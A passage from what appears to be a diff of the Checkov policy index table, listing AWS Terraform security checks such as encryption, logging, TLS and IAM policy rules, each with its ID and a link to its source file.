Ensure that load balancer is using at least TLS 1.2 | Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | +| 184 | CKV_AWS_103 | resource | aws_lb_listener | Ensure that load balancer is using at least TLS 1.2 | 
Terraform | [AppLoadBalancerTLS12.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppLoadBalancerTLS12.yaml) | +| 185 | CKV_AWS_104 | resource | aws_docdb_cluster_parameter_group | Ensure DocumentDB has audit logs enabled | Terraform | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBAuditLogs.py) | +| 186 | CKV_AWS_105 | resource | aws_redshift_parameter_group | Ensure Redshift uses SSL | Terraform | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedShiftSSL.py) | +| 187 | CKV_AWS_106 | resource | aws_ebs_encryption_by_default | Ensure EBS default encryption is enabled | Terraform | [EBSDefaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSDefaultEncryption.py) | +| 188 | CKV_AWS_107 | data | aws_iam_policy_document | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py) | +| 189 | CKV_AWS_108 | data | aws_iam_policy_document | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMDataExfiltration.py) | +| 190 | CKV_AWS_109 | data | aws_iam_policy_document | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPermissionsManagement.py) | +| 191 | CKV_AWS_110 | data | aws_iam_policy_document | Ensure IAM policies does not allow privilege escalation | Terraform | 
[IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPrivilegeEscalation.py) | +| 192 | CKV_AWS_111 | data | aws_iam_policy_document | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMWriteAccess.py) | +| 193 | CKV_AWS_112 | resource | aws_ssm_document | Ensure Session Manager data is encrypted in transit | Terraform | [SSMSessionManagerDocumentEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentEncryption.py) | +| 194 | CKV_AWS_113 | resource | aws_ssm_document | Ensure Session Manager logs are enabled and encrypted | Terraform | [SSMSessionManagerDocumentLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentLogging.py) | +| 195 | CKV_AWS_114 | resource | aws_emr_cluster | Ensure that EMR clusters with Kerberos have Kerberos Realm set | Terraform | [EMRClusterKerberosAttributes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterKerberosAttributes.py) | +| 196 | CKV_AWS_115 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured for function-level concurrent execution limit | Terraform | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py) | +| 197 | CKV_AWS_116 | resource | aws_lambda_function | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ) | Terraform | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaDLQConfigured.py) | +| 198 | CKV_AWS_117 | resource | aws_lambda_function | Ensure that AWS Lambda function is 
configured inside a VPC | Terraform | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaInVPC.py) | +| 199 | CKV_AWS_118 | resource | aws_db_instance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Terraform | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py) | +| 200 | CKV_AWS_118 | resource | aws_rds_cluster_instance | Ensure that enhanced monitoring is enabled for Amazon RDS instances | Terraform | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSEnhancedMonitorEnabled.py) | +| 201 | CKV_AWS_119 | resource | aws_dynamodb_table | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK | Terraform | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTablesEncrypted.py) | +| 202 | CKV_AWS_120 | resource | aws_api_gateway_stage | Ensure API Gateway caching is enabled | Terraform | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCacheEnable.py) | +| 203 | CKV_AWS_121 | resource | aws_config_configuration_aggregator | Ensure AWS Config is enabled in all regions | Terraform | [ConfigConfgurationAggregatorAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConfigConfgurationAggregatorAllRegions.py) | +| 204 | CKV_AWS_122 | resource | aws_sagemaker_notebook_instance | Ensure that direct internet access is disabled for an Amazon SageMaker Notebook Instance | Terraform | [SageMakerInternetAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SageMakerInternetAccessDisabled.py) | +| 205 | CKV_AWS_123 | resource | aws_vpc_endpoint_service | Ensure that VPC 
Endpoint Service is configured for Manual Acceptance | Terraform | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCEndpointAcceptanceConfigured.py) | +| 206 | CKV_AWS_124 | resource | aws_cloudformation_stack | Ensure that CloudFormation stacks are sending event notifications to an SNS topic | Terraform | [CloudformationStackNotificationArns.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudformationStackNotificationArns.py) | +| 207 | CKV_AWS_126 | resource | aws_instance | Ensure that detailed monitoring is enabled for EC2 instances | Terraform | [EC2DetailedMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2DetailedMonitoringEnabled.py) | +| 208 | CKV_AWS_127 | resource | aws_elb | Ensure that Elastic Load Balancer(s) uses SSL certificates provided by AWS Certificate Manager | Terraform | [ELBUsesSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBUsesSSL.py) | +| 209 | CKV_AWS_129 | resource | aws_db_instance | Ensure that respective logs of Amazon Relational Database Service (Amazon RDS) are enabled | Terraform | [DBInstanceLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceLogging.py) | +| 210 | CKV_AWS_130 | resource | aws_subnet | Ensure VPC subnets do not assign public IP by default | Terraform | [SubnetPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SubnetPublicIP.py) | +| 211 | CKV_AWS_131 | resource | aws_alb | Ensure that ALB drops HTTP headers | Terraform | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py) | +| 212 | CKV_AWS_131 | resource | aws_lb | Ensure that ALB drops HTTP headers | Terraform | 
[ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ALBDropHttpHeaders.py) | +| 213 | CKV_AWS_133 | resource | aws_db_instance | Ensure that RDS instances has backup policy | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py) | +| 214 | CKV_AWS_133 | resource | aws_rds_cluster | Ensure that RDS instances has backup policy | Terraform | [DBInstanceBackupRetentionPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceBackupRetentionPeriod.py) | +| 215 | CKV_AWS_134 | resource | aws_elasticache_cluster | Ensure that Amazon ElastiCache Redis clusters have automatic backup turned on | Terraform | [ElasticCacheAutomaticBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticCacheAutomaticBackup.py) | +| 216 | CKV_AWS_135 | resource | aws_instance | Ensure that EC2 is EBS optimized | Terraform | [EC2EBSOptimized.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2EBSOptimized.py) | +| 217 | CKV_AWS_136 | resource | aws_ecr_repository | Ensure that ECR repositories are encrypted using KMS | Terraform | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRRepositoryEncrypted.py) | +| 218 | CKV_AWS_137 | resource | aws_elasticsearch_domain | Ensure that Elasticsearch is configured inside a VPC | Terraform | [ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py) | +| 219 | CKV_AWS_137 | resource | aws_opensearch_domain | Ensure that Elasticsearch is configured inside a VPC | Terraform | 
[ElasticsearchInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py) | +| 220 | CKV_AWS_138 | resource | aws_elb | Ensure that ELB is cross-zone-load-balancing enabled | Terraform | [ELBCrossZoneEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBCrossZoneEnable.py) | +| 221 | CKV_AWS_139 | resource | aws_rds_cluster | Ensure that RDS clusters have deletion protection enabled | Terraform | [RDSDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSDeletionProtection.py) | +| 222 | CKV_AWS_140 | resource | aws_rds_global_cluster | Ensure that RDS global clusters are encrypted | Terraform | [RDSClusterEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterEncrypted.py) | +| 223 | CKV_AWS_141 | resource | aws_redshift_cluster | Ensured that Redshift cluster allowing version upgrade by default | Terraform | [RedshiftClusterAllowVersionUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAllowVersionUpgrade.py) | +| 224 | CKV_AWS_142 | resource | aws_redshift_cluster | Ensure that Redshift cluster is encrypted by KMS | Terraform | [RedshiftClusterKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterKMSKey.py) | +| 225 | CKV_AWS_143 | resource | aws_s3_bucket | Ensure that S3 bucket has lock configuration enabled by default | Terraform | [S3BucketObjectLock.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectLock.py) | +| 226 | CKV_AWS_144 | resource | aws_s3_bucket | Ensure that S3 bucket has cross-region replication enabled | Terraform | 
[S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml) | +| 227 | CKV_AWS_144 | resource | aws_s3_bucket_replication_configuration | Ensure that S3 bucket has cross-region replication enabled | Terraform | [S3BucketReplicationConfiguration.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketReplicationConfiguration.yaml) | +| 228 | CKV_AWS_145 | resource | aws_s3_bucket | Ensure that S3 buckets are encrypted with KMS by default | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml) | +| 229 | CKV_AWS_145 | resource | aws_s3_bucket_server_side_encryption_configuration | Ensure that S3 buckets are encrypted with KMS by default | Terraform | [S3KMSEncryptedByDefault.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3KMSEncryptedByDefault.yaml) | +| 230 | CKV_AWS_146 | resource | aws_db_cluster_snapshot | Ensure that RDS database cluster snapshot is encrypted | Terraform | [RDSClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterSnapshotEncrypted.py) | +| 231 | CKV_AWS_147 | resource | aws_codebuild_project | Ensure that CodeBuild projects are encrypted using CMK | Terraform | [CodebuildUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildUsesCMK.py) | +| 232 | CKV_AWS_148 | resource | aws_default_vpc | Ensure no default VPC is planned to be provisioned | Terraform | [VPCDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/VPCDefaultNetwork.py) | +| 233 | CKV_AWS_149 | resource | aws_secretsmanager_secret | Ensure that Secrets Manager secret is encrypted using KMS 
CMK | Terraform | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecretEncrypted.py) | +| 234 | CKV_AWS_150 | resource | aws_alb | Ensure that Load Balancer has deletion protection enabled | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py) | +| 235 | CKV_AWS_150 | resource | aws_lb | Ensure that Load Balancer has deletion protection enabled | Terraform | [LBDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBDeletionProtection.py) | +| 236 | CKV_AWS_152 | resource | aws_alb | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py) | +| 237 | CKV_AWS_152 | resource | aws_lb | Ensure that Load Balancer (Network/Gateway) has cross-zone load balancing enabled | Terraform | [LBCrossZone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBCrossZone.py) | +| 238 | CKV_AWS_153 | resource | aws_autoscaling_group | Autoscaling groups should supply tags to launch configurations | Terraform | [AutoScalingTagging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AutoScalingTagging.py) | +| 239 | CKV_AWS_154 | resource | aws_redshift_cluster | Ensure Redshift is not deployed outside of a VPC | Terraform | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftInEc2ClassicMode.py) | +| 240 | CKV_AWS_155 | resource | aws_workspaces_workspace | Ensure that Workspace user volumes are encrypted | Terraform | 
[WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceUserVolumeEncrypted.py) | +| 241 | CKV_AWS_156 | resource | aws_workspaces_workspace | Ensure that Workspace root volumes are encrypted | Terraform | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceRootVolumeEncrypted.py) | +| 242 | CKV_AWS_157 | resource | aws_db_instance | Ensure that RDS instances have Multi-AZ enabled | Terraform | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSMultiAZEnabled.py) | +| 243 | CKV_AWS_158 | resource | aws_cloudwatch_log_group | Ensure that CloudWatch Log Group is encrypted by KMS | Terraform | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupKMSKey.py) | +| 244 | CKV_AWS_159 | resource | aws_athena_workgroup | Ensure that Athena Workgroup is encrypted | Terraform | [AthenaWorkgroupEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupEncryption.py) | +| 245 | CKV_AWS_160 | resource | aws_timestreamwrite_database | Ensure that Timestream database is encrypted with KMS CMK | Terraform | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TimestreamDatabaseKMSKey.py) | +| 246 | CKV_AWS_161 | resource | aws_db_instance | Ensure RDS database has IAM authentication enabled | Terraform | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSIAMAuthentication.py) | +| 247 | CKV_AWS_162 | resource | aws_rds_cluster | Ensure RDS cluster has IAM authentication enabled | Terraform | 
[RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterIAMAuthentication.py) | +| 248 | CKV_AWS_163 | resource | aws_ecr_repository | Ensure ECR image scanning on push is enabled | Terraform | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImageScanning.py) | +| 249 | CKV_AWS_164 | resource | aws_transfer_server | Ensure Transfer Server is not exposed publicly. | Terraform | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerIsPublic.py) | +| 250 | CKV_AWS_165 | resource | aws_dynamodb_global_table | Ensure DynamoDB point in time recovery (backup) is enabled for global tables | Terraform | [DynamoDBGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBGlobalTableRecovery.py) | +| 251 | CKV_AWS_166 | resource | aws_backup_vault | Ensure Backup Vault is encrypted at rest using KMS CMK | Terraform | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BackupVaultEncrypted.py) | +| 252 | CKV_AWS_167 | resource | aws_glacier_vault | Ensure Glacier Vault access policy is not public by only allowing specific services or principals to access it | Terraform | [GlacierVaultAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlacierVaultAnyPrincipal.py) | +| 253 | CKV_AWS_168 | resource | aws_sqs_queue | Ensure SQS queue policy is not public by only allowing specific services or principals to access it | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py) | +| 254 | CKV_AWS_168 | resource | aws_sqs_queue_policy | Ensure SQS queue policy is not public by only allowing 
specific services or principals to access it | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py) | +| 255 | CKV_AWS_169 | resource | aws_sns_topic_policy | Ensure SNS topic policy is not public by only allowing specific services or principals to access it | Terraform | [SNSTopicPolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicPolicyAnyPrincipal.py) | +| 256 | CKV_AWS_170 | resource | aws_qldb_ledger | Ensure QLDB ledger permissions mode is set to STANDARD | Terraform | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerPermissionsMode.py) | +| 257 | CKV_AWS_171 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encryption is using SSE-KMS | Terraform | [EMRClusterIsEncryptedKMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterIsEncryptedKMS.py) | +| 258 | CKV_AWS_172 | resource | aws_qldb_ledger | Ensure QLDB ledger has deletion protection enabled | Terraform | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerDeletionProtection.py) | +| 259 | CKV_AWS_173 | resource | aws_lambda_function | Check encryption settings for Lambda environmental variable | Terraform | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | +| 260 | CKV_AWS_174 | resource | aws_cloudfront_distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Terraform | [CloudfrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontTLS12.py) | +| 261 | CKV_AWS_175 | resource | 
aws_waf_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | +| 262 | CKV_AWS_175 | resource | aws_wafregional_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | +| 263 | CKV_AWS_175 | resource | aws_wafv2_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | +| 264 | CKV_AWS_176 | resource | aws_waf_web_acl | Ensure Logging is enabled for WAF Web Access Control Lists | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py) | +| 265 | CKV_AWS_176 | resource | aws_wafregional_web_acl | Ensure Logging is enabled for WAF Web Access Control Lists | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py) | +| 266 | CKV_AWS_177 | resource | aws_kinesis_video_stream | Ensure Kinesis Video Stream is encrypted by KMS using a customer managed Key (CMK) | Terraform | [KinesisVideoEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisVideoEncryptedWithCMK.py) | +| 267 | CKV_AWS_178 | resource | aws_fsx_ontap_file_system | Ensure fx ontap file system is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXOntapFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOntapFSEncryptedWithCMK.py) | +| 268 | CKV_AWS_179 | resource | aws_fsx_windows_file_system | Ensure FSX Windows filesystem is encrypted by KMS using a customer managed Key (CMK) | Terraform | 
[FSXWindowsFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXWindowsFSEncryptedWithCMK.py) | +| 269 | CKV_AWS_180 | resource | aws_imagebuilder_component | Ensure Image Builder component is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ImagebuilderComponentEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderComponentEncryptedWithCMK.py) | +| 270 | CKV_AWS_181 | resource | aws_s3_object_copy | Ensure S3 Object Copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [S3ObjectCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ObjectCopyEncryptedWithCMK.py) | +| 271 | CKV_AWS_182 | resource | aws_docdb_cluster | Ensure DocumentDB is encrypted by KMS using a customer managed Key (CMK) | Terraform | [DocDBEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryptedWithCMK.py) | +| 272 | CKV_AWS_183 | resource | aws_ebs_snapshot_copy | Ensure EBS Snapshot Copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EBSSnapshotCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSSnapshotCopyEncryptedWithCMK.py) | +| 273 | CKV_AWS_184 | resource | aws_efs_file_system | Ensure resource is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSFileSystemEncryptedWithCMK.py) | +| 274 | CKV_AWS_185 | resource | aws_kinesis_stream | Ensure Kinesis Stream is encrypted by KMS using a customer managed Key (CMK) | Terraform | [KinesisStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptedWithCMK.py) 
| +| 275 | CKV_AWS_186 | resource | aws_s3_bucket_object | Ensure S3 bucket Object is encrypted by KMS using a customer managed Key (CMK) | Terraform | [S3BucketObjectEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectEncryptedWithCMK.py) | +| 276 | CKV_AWS_187 | resource | aws_sagemaker_domain | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Terraform | [SagemakerDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py) | +| 277 | CKV_AWS_187 | resource | aws_sagemaker_notebook_instance | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Terraform | [SagemakerDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py) | +| 278 | CKV_AWS_189 | resource | aws_ebs_volume | Ensure EBS Volume is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EBSVolumeEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSVolumeEncryptedWithCMK.py) | +| 279 | CKV_AWS_190 | resource | aws_fsx_lustre_file_system | Ensure lustre file systems is encrypted by KMS using a customer managed Key (CMK) | Terraform | [LustreFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LustreFSEncryptedWithCMK.py) | +| 280 | CKV_AWS_191 | resource | aws_elasticache_replication_group | Ensure ElastiCache replication group is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ElasticacheReplicationGroupEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptedWithCMK.py) | +| 281 | CKV_AWS_192 | resource | 
aws_wafv2_web_acl | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py) | +| 282 | CKV_AWS_193 | resource | aws_appsync_graphql_api | Ensure AppSync has Logging enabled | Terraform | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncLogging.py) | +| 283 | CKV_AWS_194 | resource | aws_appsync_graphql_api | Ensure AppSync has Field-Level logs enabled | Terraform | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncFieldLevelLogs.py) | +| 284 | CKV_AWS_195 | resource | aws_glue_crawler | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 285 | CKV_AWS_195 | resource | aws_glue_dev_endpoint | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 286 | CKV_AWS_195 | resource | aws_glue_job | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 287 | CKV_AWS_196 | resource | aws_elasticache_security_group | Ensure no aws_elasticache_security_group resources exist | Terraform | [ElasticacheHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheHasSecurityGroup.py) | +| 288 | CKV_AWS_197 | resource | aws_mq_broker | Ensure MQ Broker Audit 
logging is enabled | Terraform | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerAuditLogging.py) | +| 289 | CKV_AWS_198 | resource | aws_db_security_group | Ensure no aws_db_security_group resources exist | Terraform | [RDSHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSHasSecurityGroup.py) | +| 290 | CKV_AWS_199 | resource | aws_imagebuilder_distribution_configuration | Ensure Image Builder Distribution Configuration encrypts AMI's using KMS - a customer managed Key (CMK) | Terraform | [ImagebuilderDistributionConfigurationEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderDistributionConfigurationEncryptedWithCMK.py) | +| 291 | CKV_AWS_200 | resource | aws_imagebuilder_image_recipe | Ensure that Image Recipe EBS Disk are encrypted with CMK | Terraform | [ImagebuilderImageRecipeEBSEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderImageRecipeEBSEncrypted.py) | +| 292 | CKV_AWS_201 | resource | aws_memorydb_cluster | Ensure MemoryDB is encrypted at rest using KMS CMKs | Terraform | 